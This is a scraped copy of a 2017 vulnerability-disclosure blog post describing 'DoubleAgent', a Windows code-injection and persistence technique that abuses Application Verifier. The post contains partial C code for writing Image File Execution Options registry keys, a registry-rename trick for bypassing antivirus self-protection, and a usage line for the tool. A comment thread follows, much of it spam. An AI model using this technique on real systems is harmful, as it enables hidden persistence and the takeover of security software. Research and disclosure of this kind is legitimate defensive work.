Double agent zero-day code injection and persistence technique
1. 7/5/2018 DoubleAgent: Zero-Day Code Injection and Persistence Technique | Vulnerability Detection
https://cybellum.com/doubleagentzero-day-code-injection-and-persistence-technique/ 1/23
DoubleAgent: Zero-Day Code
Injection and Persistence
Technique
by Michael Engstler | Mar 22, 2017 | Zero-Day Disclosure | 73 comments
a
2. 7/5/2018 DoubleAgent: Zero-Day Code Injection and Persistence Technique | Vulnerability Detection
https://cybellum.com/doubleagentzero-day-code-injection-and-persistence-technique/ 2/23
See how Cybellum uses dynamic analysis to detect
ulnerabilities in C/C++ closed binaries. Get a free
demo.
Overview
We’d like to introduce a new Zero-Day technique for injecting code and
maintaining persistency on a machine (i.e. auto-run) dubbed
DoubleAgent. DoubleAgent can exploit: Every Windows version
(Windows XP to Windows 10) Every Windows architecture (x86 and x64)
Every Windows user (SYSTEM/Admin/etc.) Every target process,
including privileged processes (OS/Antivirus/etc.)
DoubleAgent exploits a 15 years old legitimate feature of Windows and
therefore cannot be patched. Code Injection DoubleAgent gives the
attacker the ability to inject any DLL into any process. The code injection
occurs extremely early during the victim’s process boot, giving the
attacker full control over the process and no way for the process to
protect itself. The code injection technique is so unique that it’s not
detected or blocked by any antivirus.
Persistency DoubleAgent can continue injecting code even after reboot
making it a perfect persistence technique to “survive”
reboots/updates/reinstalls/patches/etc. Once the attacker decides to
inject a DLL into a process, they are forcefully bounded forever. Even if
the victim would completely uninstall and reinstall its program, the
attacker’s DLL would still be injected every time the process executes.
Attack Vectors
Attacking Antivirus & Next Generation Antivirus – Taking full control of
any antivirus by injecting code into it while bypassing all of its self-
protection mechanism. The attack has been verified and works on all
the major antiviruses including but not limited to: Avast, AVG, Avira,
Bitdefender, Comodo, ESET, F-Secure, Kaspersky, Malwarebytes,
McAfee, Norton, Panda, Quick Heal and Trend Micro.
Installing Persistent Malware – Installing malware that can “survive”
reboots and are automatically executed once the operating system
boots.
Hijacking Permissions – Hijacking the permissions of an existing
trusted process to perform malicious operations in disguise of the
trusted process. e.g. Exfiltrating data, C&C communication, lateral
movement, stealing and encrypting sensitive data.
Altering Process Behavior – Modifying the behavior of the process.
e.g. Installing backdoors, weakening encryption algorithms, etc.
3. 7/5/2018 DoubleAgent: Zero-Day Code Injection and Persistence Technique | Vulnerability Detection
https://cybellum.com/doubleagentzero-day-code-injection-and-persistence-technique/ 3/23
Attacking Other Users/Sessions – Injecting code to processes of other
users/sessions (SYSTEM/Admin/etc.).
Technical Deep Dive
Microsoft Application Verifier Provider Microsoft offers a standard way to
install runtime verification tools for native code via Microsoft Application
Verifier Provider DLLs. A verifier provider DLL is simply a DLL that is
loaded into the process and is responsible for performing runtime
verifications for the application. In order to register a new Application
Verifier Provider DLL one needs to create a verifier provider DLL and
register it by creating a set of keys in the registry. Once a DLL has been
registered as a verifier provider DLL for a process, it would permanently
be injected by the Windows Loader into the process every time the
process starts, even after reboots/updates/reinstalls/patches/etc.
Registration Application verifier providers are registered per executable
name, meaning each DLL is bounded to a specific executable name, and
would be injected to every new process that was launched with the
registered process name. e.g. If one would register DoubleAgentDll.dll to
cmd.exe and would launch: “C:/cmd.exe” and
“C:/Windows/System32/cmd.exe” then DoubleAgentDll.dll would be
injected to both processes. Once registered, the injection happens
automatically by the operating system every time a new process is
created with the registered name. The injection would happen
consistently regardless of rebootsupdatesreinstallspatches or anything
else. Each time a new process is created with the registered name it
would be injected with the application verifier provider. One can register
a new application verifier provider by using our publicly available
DoubleAgent project.
Or integrate the registration capabilities in an existing project using our verifier
module.
1
2
Usage: DoubleAgent.exe installuninstallrepair process_name
e.g. DoubleAgent.exe install cmd.exe
1
2
3
4
5
6
7
8
9
10
11
12
13
/*
* Installs an application verifier for the process
*/
DOUBLEAGENT_STATUS VERIFIER_Install(IN PCWSTR pcwszProcessName, IN PCWSTR p
/*
* In some cases (application crash, exception, etc.) the installuninstall
* Repairs the machine to its original state
*/
DOUBLEAGENT_STATUS VERIFIER_Repair(VOID);
/*
* Uninstalls the application verifier from the process
*/
VOID VERIFIER_Uninstall(IN PCWSTR pcwszProcessName, IN PCWSTR pcwszVrfDllNa
4. 7/5/2018 DoubleAgent: Zero-Day Code Injection and Persistence Technique | Vulnerability Detection
https://cybellum.com/doubleagentzero-day-code-injection-and-persistence-technique/ 4/23
Under the hood, the registration process creates two new registry keys under:
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows
NT/CurrentVersion/Image File Execution Options/PROCESS_NAME
The final result should be:
Some antiviruses try to protect the keys of their processes under the
“Image File Execution Options” by trying to block any attempt to
createmodify keys. e.g. an antivirus might try to block any attempt to
access “Image File Execution Options/ANTIVIRUS_NAME”.
These simple protections can easily be bypassed by slightly modifying
the registry path. e.g. Instead of accessing “Image File Execution
Options/ANTIVIRUS_NAME” we would first rename “Image File
Execution Options” to a temporary new name like “Image File Execution
Options Temp”, create the new registry keys under “Image File Execution
Options TempANTIVIRUS_NAME” and then rename “Image File
Execution Options” back to its original name.
Because the creation of the new keys happened under “Image File
Execution Options TempANTIVIRUS_NAME” and not “Image File
Execution Options/ANTIVIRUS_NAME” it was enough to bypass the
antivirus self-protection technique. From all the antiviruses we tested
only a few tried to protect their registry keys, and all of them were
bypassed using the “Rename Technique”. The “Rename Technique” has
been implemented as part of our verifier module can can be used “out-
of-the-box”.
1
2
3
4
5
6
7
8
/* Creates the VerifierDlls value and sets it to the verifier dll name */
bCreatedVerifierDlls = (ERROR_SUCCESS == RegSetKeyValueW(hIfeoKey, pcwsz
/*
* Creates the GlobalFlag value and sets it to FLG_APPLICATION_VERIFIER
* Read more: https://msdn.microsoft.com/en-us/library/windows/hardware/
*/
bCreatedGlobalFlag = (ERROR_SUCCESS == RegSetKeyValueW(hIfeoKey, pcwszPr
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
/* Creates the VerifierDlls value and sets it to the verifier dll name */
bCreatedVerifierDlls = (ERROR_SUCCESS == RegSetKeyValueW(hIfeoKey, pcws
/*
* Creates the GlobalFlag value and sets it to FLG_APPLICATION_VERIFIER
* Read more: https://msdn.microsoft.com/en-us/library/windows/hardware/
*/
bCreatedGlobalFlag = (ERROR_SUCCESS == RegSetKeyValueW(hIfeoKey, pcwszP
/*
* The key creation might fail because some antiviruses protect the key
* One possible bypass is to rename the IFEO key name to a temporary na
*/
if ((FALSE == bCreatedVerifierDlls) || (FALSE == bCreatedGlobalFlag))
{
5. 7/5/2018 DoubleAgent: Zero-Day Code Injection and Persistence Technique | Vulnerability Detection
https://cybellum.com/doubleagentzero-day-code-injection-and-persistence-technique/ 5/23
Injection Every process starts when the operating system transfers
control from kernel mode to user mode by calling ntdll!LdrInitializeThunk.
From this moment ntdll is responsible for initializing the process
(initializing globals, loading imports, etc.) and eventually transferring
control to the executed program’s main function.
The process is in such an infant stage that the only loaded modules are
ntdll.dll and the executable (NS.exe).
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
/* Renames the IFEO key name to a temporary name */
if (ERROR_SUCCESS != RegRenameKey(hIfeoKey, NULL, VERIFIER_IMAGE_FI
{
DOUBLEAGENT_SET(eStatus, DOUBLEAGENT_STATUS_DOUBLEAGENT_VERIFIE
goto lbl_cleanup;
}
bKeyRenamed = TRUE;
/*
* Opens the temporary IFEO key
* The key is reopened because some antiviruses continue monitoring
*/
if (ERROR_SUCCESS != RegOpenKeyExW(HKEY_LOCAL_MACHINE, VERIFIER_IMA
{
DOUBLEAGENT_SET(eStatus, DOUBLEAGENT_STATUS_DOUBLEAGENT_VERIFIE
goto lbl_cleanup;
}
if (FALSE == bCreatedVerifierDlls)
{
/* Tries again to create the VerifierDlls value */
if (ERROR_SUCCESS != RegSetKeyValueW(hIfeoKeyTemp, pcwszProcess
{
DOUBLEAGENT_SET(eStatus, DOUBLEAGENT_STATUS_DOUBLEAGENT_VER
goto lbl_cleanup;
}
bCreatedVerifierDllsTemp = TRUE;
}
if (FALSE == bCreatedGlobalFlag)
{
/* Tries again to create the GlobalFlag value */
if (ERROR_SUCCESS != RegSetKeyValueW(hIfeoKeyTemp, pcwszProcess
{
DOUBLEAGENT_SET(eStatus, DOUBLEAGENT_STATUS_DOUBLEAGENT_VER
goto lbl_cleanup;
}
bCreatedGlobalFlagTemp = TRUE;
}
}
6. 7/5/2018 DoubleAgent: Zero-Day Code Injection and Persistence Technique | Vulnerability Detection
https://cybellum.com/doubleagentzero-day-code-injection-and-persistence-technique/ 6/23
Ntdll doesn’t waste time and starts initializing the process, when most of
the initialization happens in ntdll!LdrpInitializeProcess.
Normally the first DLL that would be loaded would be kernel32.dll.
7. 7/5/2018 DoubleAgent: Zero-Day Code Injection and Persistence Technique | Vulnerability Detection
https://cybellum.com/doubleagentzero-day-code-injection-and-persistence-technique/ 7/23
But if Application Verifier is on, ntdll!LdrpInitializeProcess calls
ntdll!AVrfInitializeVerifier which causes our verifier provider DLL to get
loaded just before loading kernel32.
8. 7/5/2018 DoubleAgent: Zero-Day Code Injection and Persistence Technique | Vulnerability Detection
https://cybellum.com/doubleagentzero-day-code-injection-and-persistence-technique/ 8/23
Loading at such an early stage, before any other system dll, gives us
absolute control over the process.
Once our DLL has been loaded by ntdll, our DllMain would be called and
we are free to do as we wish inside the victim process.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
static BOOL main_DllMainProcessAttach(VOID)
{
DOUBLEAGENT_STATUS eStatus = DOUBLEAGENT_STATUS_INVALID_VALUE;
/*
**********************************************************************
Enter Your Code Here
**********************************************************************
*/
/* Succeeded */
DOUBLEAGENT_SET(eStatus, DOUBLEAGENT_STATUS_SUCCESS);
/* Returns status */
return FALSE != DOUBLEAGENT_SUCCESS(eStatus);
}<br /><br /><strong style="color: #808285; font-family: ProximaNova, sans-
9. 7/5/2018 DoubleAgent: Zero-Day Code Injection and Persistence Technique | Vulnerability Detection
https://cybellum.com/doubleagentzero-day-code-injection-and-persistence-technique/ 9/23
Microsoft has provided a new design concept for antivirus vendors
called Protected Processes. The new concept is specially designed for
antivirus services. Antivirus processes can be created as “Protected
Processes” and the protected process infrastructure only allows trusted,
signed code to load and has built-in defense against code injection
attacks.
This means that even if an attacker found a new Zero-Day technique for
injecting code, it could not be used against the antivirus as its code is
not signed. Currently no antivirus (except Windows Defender) has
implemented this design. Even though Microsoft made this design
available more than 3 years ago. It’s important to note, that even when
the antivirus vendors would block the registration attempts, the code
injection technique and the persistency technique would live forever
since it’s legitimate part of the OS.
Source Code
The DoubleAgent source code project can be found on our company’s
public Github.
Summary
Attackers are always evolving and finding new Zero-Day attacks. We
need to make more efforts to detect and prevent these attacks, and stop
blindly trusting traditional security solutions, that as shown here, are not
only ineffective against Zero-Days but also open new opportunities for
the attacker to create complicated and deadly attacks.
*Update
To clarify, of course we haven’t discovered the existence of Application
Verifier, it’s part of the OS so users can use it. Application Verifier as a
hooking technique was discussed long ago as early as 2011. What we
discovered and focused about was that AVRF can be used for:
1. Generic code injection technique that is undetected by AV.
2. Generic persistence technique that is also undetected by AV.
3. And most importantly, injecting code directly into the AV while
bypassing its self-protection techniques. None of these points where
discussed in previous articles. We believe these points are a significant
tool that can be used by attackers to help bypass and abuse antivirus
software. – You do need a privileged account to run DoubleAgent as
DoubleAgent is designed as a post-breach attack.
Even after a computer is breached, and attacker still needs to hide from
the AV, spread its code, maintain persistence and find ways to
exfiltrate/steal/encrypt data without being caught. DoubleAgent gives
the attacker the ability to control the AV and perform all the operations
above without being detected, while keeping the illusion that the AV is
working normally.
10. 7/5/2018 DoubleAgent: Zero-Day Code Injection and Persistence Technique | Vulnerability Detection
https://cybellum.com/doubleagentzero-day-code-injection-and-persistence-technique/ 10/23
73 Comments
–ESET AV do implement “Protected Processes”, however, not over all
process so they are still vulnerable.
–Trend Micro just released a hotfix for the vulnerability, you can find the
official hotfix here.
BE THE FIRST TO KNOW
Subscribe to get our vulnerability analysis posts, new blog content and
very infrequent special announcements. We won’t spam you, and will
never sell your data.
First Name
Last Name
Email Address
Subscribe
Robert on March 21, 2017 at 5:06 pm
Once again – great article.
I hope that the rest of the vendors will issue a fix ASAP.
zzz on March 23, 2017 at 6:09 am
zzzz
11. 7/5/2018 DoubleAgent: Zero-Day Code Injection and Persistence Technique | Vulnerability Detection
https://cybellum.com/doubleagentzero-day-code-injection-and-persistence-technique/ 11/23
deepak on March 22, 2017 at 5:52 am
simply awesome!!!
Ronen on March 22, 2017 at 8:32 am
Just tested the GitHub code RN on my Win8.1 VM. It works great.
Keep up the good work fellows
Dje on March 23, 2017 at 3:00 pm
Rhaaa… Can’t manage to build it to test in a VM. The
PlatformToolset=141 is killing me, it only works with 140 but
the exe seems not being working (no registry keys created).
Any tip, which VS did you used? Thanks
Michael on March 26, 2017 at 4:46 pm
We used VS2017, should work for older versions too.
Contact us at info@cybellum.com and we would try to
help.
yun on March 26, 2017 at 8:31 am
hi,when test DoubleAgent project on
Win7_x64,DoubleAgent.exe install notepad.exe,
one error occurs “application can not start
0xc0000142”,could you pelease give some tips?
Michael on March 26, 2017 at 4:47 pm
We need a bit more details, contact us at
info@cybellum.com and we would try to help.
Tkchet on March 26, 2017 at 12:27 pm
How can I get a sample of the code for testing?
Michael on March 26, 2017 at 4:45 pm
12. 7/5/2018 DoubleAgent: Zero-Day Code Injection and Persistence Technique | Vulnerability Detection
https://cybellum.com/doubleagentzero-day-code-injection-and-persistence-technique/ 12/23
Available on GitHub
https://github.com/Cybellum/DoubleAgent
zalehack on March 22, 2017 at 8:52 am
Good Job Thank !
tihsllub on March 22, 2017 at 9:03 am
Wow. If you’re running code as a local administrator, you can inject
any code you want in non-PPL processes (requires a MICROSOFT
digital signature, not suitable for AV). Wow. Such not a legitimate
feature. Such unique. Such a 0day. Definitely needs a new logo.
Anyway, nice persistence code injection/technique.
freeko on March 22, 2017 at 12:03 pm
Thumbs up. Zero-day keyword should be removed IMHO
Aviv on March 22, 2017 at 2:05 pm
As far as I know zero-day stands for a new-
unpatched-vulnerability which is the case here. So
why do you think these keywords should be
removed?
Aviv on March 22, 2017 at 2:08 pm
Indeed running as administrator – but does it mean that I
should be able to inject my DLL into a protected/trusted
process? cross session? cross user? Isn’t it true that I can
use this vulnerability to exfiltrate data from a trusted
process?
undocumented on March 23, 2017 at 8:49 am
No. It’s not a vulnerability. Period.
If you’re admin, you’re admin. Just become system
(psexec/service/etc.) and do whatever you want on
non-PPL processes.
13. 7/5/2018 DoubleAgent: Zero-Day Code Injection and Persistence Technique | Vulnerability Detection
https://cybellum.com/doubleagentzero-day-code-injection-and-persistence-technique/ 13/23
Anonymous on March 22, 2017 at 9:55 am
Undocumented? Really?
http://kitrap08.blogspot.com.au/2011/04/application-verifier.html
a on March 22, 2017 at 12:11 pm
Some Russian dude published something, and you call it
documented?
You guys are killing me…
me on March 22, 2017 at 11:09 pm
https://blogs.msdn.microsoft.com/reiley/2012/08/17/a-
debugging-approach-to-application-verifier/
me on March 23, 2017 at 6:53 pm
what about Alex Ionescu amazing presentation about
HookingNirvana at Recon2015?
https://github.com/ionescu007/HookingNirvana/blob/
master/verif.dll/verif.c
and what about Alex Ionescu tweet?
https://twitter.com/aionescu
NtMapViewOfSection on March 23, 2017 at 7:40
pm
They didn’t claim to discover Application
Verifier and so didn’t Alex Ionescu
(Application Verifier has been around long
before Alex as early as 2011
http://kitrap08.blogspot.co.il/2011/04/applicati
on-verifier.html).
This discovery is about how to abuse
Application Verifier in a post-breach situation.
Once an attacker managed to breach a
network and gain privileges, he stills needs
deal with the AV for every step he does
(downloaduploading data, infecting other
processes, maintaining persistence, etc.).
This discovery gives an attacker the tools to
take over the and use it to perform stealthy
data exfiltration, C&C communication, lateral
movement, etc. All this while maintaining a
false perception as if the AV is working
14. 7/5/2018 DoubleAgent: Zero-Day Code Injection and Persistence Technique | Vulnerability Detection
https://cybellum.com/doubleagentzero-day-code-injection-and-persistence-technique/ 14/23
normally. This was not presented in Alex’s
articles (or in fact any other article on the
web).
Varunendra on March 22, 2017 at 12:14 pm
This is simply Amazing.
Nice finding guys kudos
plipopipopa on March 22, 2017 at 12:16 pm
It’s kind of like the Linux LD_PRELOAD, isn’t it ?
jackfire on March 22, 2017 at 3:21 pm
This is simply Amazing finding for desktop OS…
kudos guys.
Malin on March 22, 2017 at 5:29 pm
It looks like the crap carries on from build to build on all OS’s. I was
just reading the other day about the HDLC bug in Linux. Just
another piece of crap that should’ve been removed a long time
ago.
scooller on March 23, 2017 at 2:19 am
why I’v got 0xc0000142 error when I try to inject empty dll
thepear on March 25, 2017 at 2:59 am
I get the same on Windows 7 when trying to run the sample
code.
Michael on March 26, 2017 at 4:48 pm
Contact us at info@cybellum.com and we would try to
help.
15. 7/5/2018 DoubleAgent: Zero-Day Code Injection and Persistence Technique | Vulnerability Detection
https://cybellum.com/doubleagentzero-day-code-injection-and-persistence-technique/ 15/23
Jacob on March 23, 2017 at 4:51 am
Repackaging a 2012 MSDN article as a “zero day”?
https://blogs.msdn.microsoft.com/reiley/2012/08/17/a-debugging-
approach-to-application-verifier/
A-Friend-of-Jacob on March 23, 2017 at 7:51 pm
What?? Would writing a malware that uses WinApi be
considered repackaging WinApi? The whole point of the
post is to ABUSE AFRV in order to perform malicious
operations. The link you posted talks about how to use
AVRF for the purpose it was build for, this post takes it a step
further and abuses it to bypass AV self-protection
techniques.
Jacob on March 23, 2017 at 11:10 pm
Writing malware that abuses Win32 API would not be
considered a “Zero Day”, so I don’t know point you
are trying to make with that analogy. Besides, the
Image File Execution Options registry key has been
known as a malware persistence mechanism for
years. There is absolutely nothing new in the entire
blog post.
Larks on March 23, 2017 at 12:50 pm
What events that leads to a successful injection should we be
keeping an eye on using Microsoft SYSMON or the likes?
Your research is just as awesome as it is giving me headaches
BR,
Larks
Krunal on March 23, 2017 at 1:12 pm
How this attack effect victim’s computer? for example visiting any
sit or downloading something from internet?
Avi on March 23, 2017 at 1:51 pm
kudos !!!!
16. 7/5/2018 DoubleAgent: Zero-Day Code Injection and Persistence Technique | Vulnerability Detection
https://cybellum.com/doubleagentzero-day-code-injection-and-persistence-technique/ 16/23
Kevin on March 23, 2017 at 2:03 pm
Does this affect all Windows Server version or some? If it affects
some versions which one?
Abdul Adil on March 24, 2017 at 7:29 am
How can i build the source code?
Specs on March 24, 2017 at 9:59 am
Has anyone tried this against a commercial version of McAfee?
They are suggesting that they are not vulnerable as they block DLL
injection, but me thinks they have not fully understood this
technique.
Michael on March 26, 2017 at 4:52 pm
McAfee commercial version was found vulnerable. After the
publication, McAfee released a patch and are now
protected.
Don on March 24, 2017 at 1:23 pm
Would appreciate if you retest Eset using your registry bypass
method since Eset has published an advisor that a mitigation patch
has been deployed i.e HIPS module: 1273.
Michael on March 26, 2017 at 4:52 pm
ESET released a patch and are now protected.
Joe on March 24, 2017 at 6:38 pm
visual studio
augusto de arruda botelho on March 25, 2017 at 1:44 am
17. 7/5/2018 DoubleAgent: Zero-Day Code Injection and Persistence Technique | Vulnerability Detection
https://cybellum.com/doubleagentzero-day-code-injection-and-persistence-technique/ 17/23
Hey there! Would you mind if I share your blog with my myspace
group?
There’s a lot of folks that I think would really enjoy your content.
Please let me know. Many thanks
Don on March 25, 2017 at 2:45 pm
Discovered this way of running Application Verifier using a standard
user account:
Administrator: Per user verifier settings allow standard users to use
Application Verifier on Windows Vista. To enable per user verifier
settings, administrators will have to create the
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSessi
on MangerImageExecutionOptions REG_DWORD value in the
registry and set it to 0x1. Once the change is made, you will need to
reboot the machine and ask the standard user to try accessing
Application Verifier again.
Ref.: https://msdn.microsoft.com/en-
us/library/ms220948(v=vs.90).aspx
See if you can get your bypass to work under a SUA account.
Michael on March 26, 2017 at 4:58 pm
Thanks for the info, can also be done without rebooting the
machine by calling NtSetSystemInformation (requires
SeTcbPrivilege).
http://www.geoffchappell.com/studies/windows/km/ntoskrnl/
api/ex/sysinfo/image_file_execution_options.htm?tx=48
Don on March 26, 2017 at 1:25 pm
A bit more detail on using verifier.dll from standard user account
here: https://msdn.microsoft.com/en-
us/library/bb432502(v=vs.85).aspx
Sirmabus on March 26, 2017 at 7:46 pm
Thanks for pointing this technique out. Add it to the list with others
like the “AppInt” registry key way, and the custom keyboard layout
one (both of which load a DLL in ALL Windows processes, not
nicely targeted like this one).
Next time please cut a lot of the hype out. Understandable you’re
trying to promote yourself and/or your products, but you know a lot
of us that would read this in detail are tech people.
18. 7/5/2018 DoubleAgent: Zero-Day Code Injection and Persistence Technique | Vulnerability Detection
https://cybellum.com/doubleagentzero-day-code-injection-and-persistence-technique/ 18/23
Michael on March 28, 2017 at 5:18 pm
The methods you mentioned (and many more) are similar to
DoubleAgent as they are all code injection techniques. The
main difference is that DoubleAgent was unknown and
unprotected by AV vendors. Meaning an attacker could use
it to inject code anywhere (including into the AV itself) while
bypassing the the AV protection. In a post-breach scenario
this can be a powerful weapon.
air conditioning beaufort sc on March 27, 2017 at 3:50 am
Can I simply say what a relief to find somebody that
actually knows what they are talking about on the internet.
You certainly understand how to bring a problem to light and make
it
important. A lot more people must read this and understand
this side of your story. I was surprised you are not more popular
given that you most certainly have the gift.
Douglass on March 31, 2017 at 6:11 am
Nice read, I just passed this onto a friend who was doing a little
research on that. And he just bought me lunch as I found it for him
smile Therefore let me rephrase that: Thank you for lunch!
Lindsay on April 1, 2017 at 5:44 am
Hey there just wanted to give you a quick heads up and let you
know a few of the pictures aren’t loading properly. I’m not sure why
but I think its a linking issue. I’ve tried it in two different browsers
and both show the same outcome.
Dionne on April 3, 2017 at 9:47 am
I don’t even know how I ended up here, but I thought this post was
good. I don’t know who you are but definitely you are going to a
famous blogger if you aren’t already Cheers!
Mas Co on April 4, 2017 at 3:50 pm
Sorry for multiple post.The injection is working as it should when i
try it on windows server 2016 but only from admin account, if i try to
execute the exe from normal user the admin password prompt
pops in asking for the admins pass.
19. 7/5/2018 DoubleAgent: Zero-Day Code Injection and Persistence Technique | Vulnerability Detection
https://cybellum.com/doubleagentzero-day-code-injection-and-persistence-technique/ 19/23
Michael on April 5, 2017 at 2:09 pm
As stated above, You do need a privileged account (admin)
to run DoubleAgent.
Dave on April 5, 2017 at 1:54 pm
I’m very happy to read this. This is the type of manual that needs to
be given and not the accidental misinformation that’s at the other
blogs. Appreciate your sharing this greatest doc.
Nicky on April 5, 2017 at 3:44 pm
It’s perfect time to make a few plans for the future and it is time to
be happy. I’ve learn this post and if I may just I desire to suggest
you some attention-grabbing things or tips. Perhaps you could write
next articles relating to this article. I want to read more things about
it!
Dwight on April 7, 2017 at 4:17 pm
What’s Happening i am new to this, I stumbled upon this I’ve found
It absolutely helpful and it has aided me out loads. I hope to
contribute & help other users like its aided me. Great job.
corburt erilio on April 9, 2017 at 9:59 pm
Hmm it appears like your site ate my first comment (it was
extremely long) so I guess I’ll just sum it up what I wrote and say, I’m
thoroughly enjoying your blog. I too am an aspiring blog blogger
but I’m still new to everything. Do you have any helpful hints for
first-time blog writers? I’d certainly appreciate it.
OldMan on April 11, 2017 at 12:03 pm
Doesn’t seem the AV’s are taking this too seriously, I now that
Norton has seemed to ignore this, saying that it takes user
intervention at the computer. I think that all vendors should have
this patched and Microsoft should be working on a patch too.
Everyone wants to throw blame around but no one seems to want
to work together for a fix. Today it is doubleagent, tomorrow who
knows what. I think it is terrible how it has been handled.
Jason F Enos on April 14, 2017 at 12:32 am
20. 7/5/2018 DoubleAgent: Zero-Day Code Injection and Persistence Technique | Vulnerability Detection
https://cybellum.com/doubleagentzero-day-code-injection-and-persistence-technique/ 20/23
I’ll immediately grab your rss feed as I can not find your email
subscription hyperlink or e-newsletter service.
Do you’ve any? Please let me understand in order that I may
just subscribe. Thanks.
ggg on April 14, 2017 at 7:27 am
on Windows 7 NOT work =(((
(how to load PE without Kernel32.dll???). Example???
Michael on April 17, 2017 at 11:00 am
https://github.com/Cybellum/DoubleAgent/issues/2#issueco
mment-289804888
ggg on April 18, 2017 at 6:58 am
There is no answer to my question.
Where is a code sample that allows you to run PE on
Win7?
Michael on April 18, 2017 at 9:57 am
We don’t have such sample, you’ll need to
code it yourself.
The Lost Ways Survivalism eBook on April 18, 2017 at 9:06 pm
Superb article and fantastic webpage. Delighted I came across this
while checking hash tags on Twitter.
Yukiko on April 21, 2017 at 11:41 pm
Its like you read my thoughts! You seem to grasp
a lot approximately this, like you wrote the e-book in it or
something. I think that you just could do with some p.c.
to pressure the message house a little bit, but instead of that, that is
magnificent blog. A great read. I’ll certainly be back.
Glayds on April 22, 2017 at 1:11 pm
21. 7/5/2018 DoubleAgent: Zero-Day Code Injection and Persistence Technique | Vulnerability Detection
https://cybellum.com/doubleagentzero-day-code-injection-and-persistence-technique/ 21/23
Greetings from California! I’m bored to tears at work so I decided to
browse your blog on my iphone during lunch break. I enjoy the
knowledge you present here and can’t wait to take a look when I
get home. I’m surprised at how quick your blog loaded on my
mobile .. I’m not even using WIFI, just 3G .. Anyhow, very good site!
Joshua on April 25, 2017 at 10:44 am
Hey I am so delighted I found your site, I really found you by error,
while I was researching on Google for something else, Regardless I
am here now and would just like to say cheers for a tremendous
post and a all round enjoyable blog (I also love the theme/design), I
don’t have time to read through it all at the moment but I have
saved it and also included your RSS feeds, so when I have time I
will be back to read much more, Please do keep up the superb job.
Jonathon on April 25, 2017 at 3:33 pm
I was just searching for this info for some time. After six hours of
continuous Googleing, at last I got it in your website. I wonder what
is the lack of Google strategy that don’t rank this kind of informative
websites in top of the list. Generally the top web sites are full of
garbage.
Tomeka on April 26, 2017 at 1:13 pm
My brother suggested I may like this website. He was entirely right.
This publish truly made my day. You can not consider just how
much time I had spent for this info! Thank you!
Lorene Lame on June 21, 2017 at 10:11 am
Thanks on your marvelous posting! I definitely enjoyed reading it,
you’re a great author.I will be sure to bookmark your blog and will
eventually come back sometime soon. I want to encourage that you
continue your great writing, have a nice afternoon!
feminist shirt rage on July 4, 2017 at 5:30 am
Nice post. I was checking continuously this weblog and
I am impressed! Extremely useful information specially
the final phase I take care of such information a lot.
I used to be seeking this particular info for a very long time.
Thanks and best of luck.
http://www.djcrazyjimmy.com/ on July 4, 2017 at 3:09 pm
22. 7/5/2018 DoubleAgent: Zero-Day Code Injection and Persistence Technique | Vulnerability Detection
https://cybellum.com/doubleagentzero-day-code-injection-and-persistence-technique/ 22/23
I read this article fully regarding the difference of hottest and earlier
technologies, it’s amazing article.
payday loans on July 5, 2017 at 7:12 pm
Awesome article.
Learn More
Follow Us:
Contact Us
Kharuts St 9
Tel Aviv-Yafo, 6706028
Israel
info (at) cybellum.com
+972-3-914-9140
Vulnerabilities
Blog
Contact